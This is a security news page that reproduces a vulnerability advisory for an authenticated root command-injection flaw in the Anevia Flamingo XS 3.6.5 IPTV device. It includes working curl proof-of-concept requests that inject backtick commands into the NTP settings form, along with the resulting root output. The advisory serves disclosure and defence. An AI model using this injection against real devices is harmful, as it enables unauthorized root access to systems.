Security
Headlines
HeadlinesLatestCVEs

Headline

Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution

Anevia Flamingo XS version 3.6.5 suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges.

Packet Storm
Open in Source
#vulnerability#web#linux#debian#apache#git#php#rce#auth
Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code ExecutionVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.5                  Hardware revision: 1.1                  SoapLive 2.4.0                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The affected device suffers from authenticated remote codeexecution vulnerability. A remote attacker can exploit this issueand execute arbitrary system commands granting her system accesswith root privileges.Tested on: GNU/Linux 3.14.29 (x86_64)           Apache/2.2.22 (Debian)           PHP/5.6.0-0anevia2Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5778Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php13.04.2023--$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data        <td>uid=33(www-data)</td>          <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>        <td>gid=33(www-data)</td>          <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>        <td>groups=33(www-data),6(disk),25(floppy)</td>          <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>---$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root        <td>uid=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>        <td>gid=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>        <td>groups=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3
Packet Storm